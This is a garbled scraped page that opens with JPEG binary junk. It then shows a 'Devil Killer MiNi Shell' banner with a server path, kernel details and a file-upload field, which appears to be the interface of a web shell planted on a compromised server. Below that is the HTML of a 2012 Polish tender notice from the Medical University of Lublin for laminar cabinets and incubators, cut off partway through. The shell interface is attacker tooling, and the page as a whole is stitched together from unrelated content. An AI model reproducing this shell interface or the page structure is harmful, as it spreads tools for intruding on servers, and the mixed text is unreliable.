JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/69115-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa i montaż inkubatorów i komór laminarnych dla Uniwersytetu Medycznego w Lublinie; nr sprawy UM-ZP-262-19-12.</b><br>
<b>Numer ogłoszenia: 69115 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Lublinie , Al. Racławickie 1, 20-059 Lublin, woj. lubelskie, tel. 81 528 88 88, faks 81 528 89 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż inkubatorów i komór laminarnych dla Uniwersytetu Medycznego w Lublinie; nr sprawy UM-ZP-262-19-12..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż na podstawie umowy sprzedaży inkubatorów i komór laminarnych (zwanych dalej urządzeniami - przedmiotem zamówienia) dla Uniwersytetu Medycznego w Lublinie, ujętych w projekcie pn. Przebudowa Centrum Innowacyjnych Technologii Nanobiomedycznych Uniwersytetu Medycznego w Lublinie określonych w 5 zadaniach (ofertach częściowych) następująco:


Zadanie nr 1 - Komora laminarna i inkubator do hodowli komórkowych:

1.	 Zadanie obejmuje dostawę i montaż komory laminarnej - 1 sztuka i inkubatora do hodowli komórkowych - 1 sztuka, w konfiguracji określonej w załączniku nr 6 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenia muszą spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 6 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne
33152000-0 - Inkubatory

Zadanie nr 2 - Komora laminarna:

1.	 Zadanie obejmuje dostawę i montaż komory laminarnej - 1 sztuka, w konfiguracji określonej w załączniku nr 7 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenie musi spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 7 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne

Zadanie nr 3 - Komora laminarna Biohazard:
1.	 Zadanie obejmuje dostawę i montaż komory laminarnej Biohazard - 1 sztuka, w konfiguracji określonej w załączniku nr 8 do niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
2.	Oferowane przez Wykonawcę urządzenie musi spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 8 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne


Zadanie nr 4 - Komora laminarna:

1.	 Zadanie obejmuje dostawę i montaż komory laminarnej - 2 sztuki, w konfiguracji określonej w załączniku nr 9 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenia muszą spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 9 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne

Zadanie nr 5 - Inkubator Co2:

1.	Zadanie obejmuje dostawę i montaż inkubatora Co2 - 2 sztuki, w konfiguracji określonej w załączniku nr 10 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenia muszą spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 10 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
	33152000-0 - Inkubatory
Informacje dodatkowe:
1.	Przedmiot zamówienia określony w niniejszej SIWZ w zadaniach nr 1 - 5 realizowany jest w ramach projektu pt.: Przebudowa Centrum Innowacyjnych Technologii Nanobiomedycznych Uniwersytetu Medycznego w Lublinie realizowanego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, Priorytet I, Działanie I.3 Wspieranie innowacji na podstawie umowy o dofinansowanie nr POPW.01.03.00-06-015-09-00.
2.	Zamawiający wymaga dostawy urządzeń fabrycznie nowych, nieuszkodzonych, nieregenerowanych, nie będących uprzednio przedmiotem ekspozycji i wystaw, kompletnych i gotowych do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonych prawami osób lub podmiotów trzecich.
3.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku. 
4.	Ilekroć w opisie przedmiotu zamówienia zawartym w SIWZ wskazane zostały normy, znaki towarowe, patenty lub pochodzenie, Zamawiający dopuszcza rozwiązania (oferty) równoważne.
5.	Za ofertę równoważną Zamawiający uzna tę, która spełnia wszystkie wymagania Zamawiającego określone w opisie przedmiotu zamówienia zawartym w rozdziale IV oraz w szczegółowym opisie przedmiotu zamówienia, tj. w załącznikach nr 6 - 10 do SIWZ, których parametry jakościowe i użytkowe są identyczne lub nie gorsze niż wskazane w zał. 6 - 10 do SIWZ.
6.	Ewentualne wskazane przez Zamawiającego nazwy, producenci mają na celu określenie klasy produktu będącego przedmiotem zamówienia i służą ustaleniu standardu nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
7.	Wykonawca, który powoła się na rozwiązanie równoważne, jest obowiązany wykazać, że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.
8.	Wymagane warunki gwarancji, serwisu i szkolenia w zakresie zadania nr 1 - 5 określone zostały w załączniku nr 11 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.40-3, 33.15.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium. 2. Wykonawcy przystępujący do przetargu obowiązani są wnieść wadium w wysokości:  
2.1.	do Zadania nr 1 - 1 600, 00 PLN (słownie: jeden tysiąc sześćset PLN)
2.2.	do Zadania nr 2  -	 500, 00 PLN (słownie: pięćset PLN)
2.3.	do Zadania nr 3  -	 650, 00 PLN (słownie: sześćset pięćdziesiąt PLN)
2.4.	do Zadania nr 4  -	 1 300, 00 PLN (słownie: jeden tysiąc trzysta PLN)
2.5.	do Zadania nr 5  -	 1 600, 00 PLN (słownie: jeden tysiąc sześćset PLN)
 3. Wadium należy wnieść przed upływem terminu składania ofert. Szczegółowe informacje dotyczące wadium zostały zawarte w Specyfikacji Istotnych Warunków Zamówienia dostępnej na stronie internetowej Zamawiającego (www.umlub.pl).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Zamawiający wymaga, aby oferowane urządzenia odpowiadały:
1.1.	Europejskiej Normie EN 12469:2000 dotyczącej bezpieczeństwa mikrobiologicznego (potwierdzającej spełnianie II klasy bezpieczeństwa mikrobiologicznego przez komory laminarne, stanowiące przedmiot zamówienia w zakresie zadania nr 1,3 i 4)  - w zakresie zadań: 1,3 i 4. 
1.2.	Normie PN-EN 1822 1:2002  potwierdzającej zastosowanie w komorze laminarnej filtrów o trzeciej klasie czystości powietrza wg ISO 14644.1 ( co stanowi odpowiednik klasy pierwszej wg US Federal Standard 209E) - w zakresie zadań: 1,3 i 4  (komory laminarne);

2.	W celu potwierdzenia, że oferowane urządzenia będą odpowiadały wymaganiom określonym przez Zamawiającego w pkt. 1, w ofercie należy złożyć:
2.1.	Dokumenty (np. certyfikaty, deklaracje zgodności producenta) potwierdzające, że oferowany przedmiot zamówienia odpowiada normie określonej w pkt. 1.1;
2.2.	Dokumenty potwierdzające, że oferowany przedmiot zamówienia odpowiada normie określonej w pkt. 1.2.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosownie do treści § 4 ust. 1 rozporządzenia, zamiast dokumentów o których mowa w III.4.2 - Wykonawca składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości; 2. Dokumenty, o których mowa w pkt. 1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis pkt. 2. stosuje się odpowiednio. Dokument ten winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 4. W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 5.Jeżeli Wykonawca, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, to zobowiązany jest również przedłożyć: 5.1 Pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia; 5.2.Oświadczenie i dokumenty dotyczące tych podmiotów, wymienione w punkcie III.4.2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej Umowy może nastąpić w formie pisemnego aneksu pod rygorem nieważności, w następujących sytuacjach:
1.1	braku pełnej gotowości pomieszczeń przeznaczanych do montażu przedmiotu umowy;
1.2	aktualizacji rozwiązań ze względu na postęp techniczny lub technologiczny (np. wycofanie z obrotu urządzeń lub materiałów), zmiana nie może spowodować zmiany ceny oraz obniżenia parametrów technicznych, jakościowych i innych wynikających z oferty, na podstawie których był dokonany wybór Wykonawcy;
1.3	konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych 
przez Strony, zmiana nie może spowodować zmiany ceny wynikającej z oferty Wykonawcy;
1.4	zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy 
do aktualnego stanu prawnego;
1.5	zmiany stawki podatku od towarów i usług; wartość umowy określona w §5 ust. 1 umowy ulegnie zmniejszeniu w przypadku obniżenia stawki podatku od towarów i usług lub powiększeniu w przypadku podwyższenia stawki podatku od towarów i usług;
1.6	konieczności zmiany osób wskazanych w umowie, jako uprawnionych przedstawicieli stron do jej realizacji;
1.7	zaistnienia okoliczności (technicznych, gospodarczych itp.), których nie można było przewidzieć w chwili zawarcia umowy;
1.8	wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego 
do przewidzenia i niemożliwego do zapobieżenia;
1.9	wprowadzenia nowej technologii, lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć;
1.10	wprowadzenia nowej technologii produktu objętego przedmiotową umową, wówczas Zamawiający dopuszcza jego zastąpienie jedynie produktem równoważnym lub o wyższych parametrach jakościowych, o cenie nie wyższej niż w umowie. 
2.	Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie 
w okresie obowiązywania umowy zawierające uzasadnienie proponowanych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umlub.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) j.w. 2) osoby do kontaktu Agata Wajrak, e mail: agata.wajrak@umlub.pl, tel. (81) 528-89-67.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 09:30, miejsce: siedziba Zamawiającego w Lublinie, Al. Racławickie 1, pokój nr 22 (Kancelaria Ogólna)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia określony w  SIWZ w zadaniach nr 1 - 5 realizowany jest w ramach projektu pt.: Przebudowa Centrum Innowacyjnych Technologii Nanobiomedycznych Uniwersytetu Medycznego w Lublinie realizowanego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, Priorytet I, Działanie I.3 Wspieranie innowacji na podstawie umowy o dofinansowanie nr POPW.01.03.00-06-015-09-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Komora laminarna i inkubator do hodowli komórkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje dostawę i montaż komory laminarnej - 1 sztuka i inkubatora do hodowli komórkowych - 1 sztuka, w konfiguracji określonej w załączniku nr 6 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenia muszą spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 6 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne
33152000-0 - Inkubatory.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.40-3, 33.15.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ocena techniczna - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Komora laminarna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje dostawę i montaż komory laminarnej - 1 sztuka, w konfiguracji określonej w załączniku nr 7 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.	Oferowane przez Wykonawcę urządzenie musi spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 7 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Ocena techniczna - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Komora laminarna Biohazard.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje dostawę i montaż komory laminarnej Biohazard - 1 sztuka, w konfiguracji określonej w załączniku nr 8 do niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
2.	Oferowane przez Wykonawcę urządzenie musi spełniać parametry techniczne i użytkowe zawarte w Zestawieniu wymaganych parametrów technicznych i użytkowych stanowiącym załącznik nr 8 do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV):
38434540-3 - Komory laminarne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Ocena techniczna - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - Komora laminarna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje dostawę i montaż komory laminarnej - 2 sztuki, w konfiguracji określonej w załączniku nr 9 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
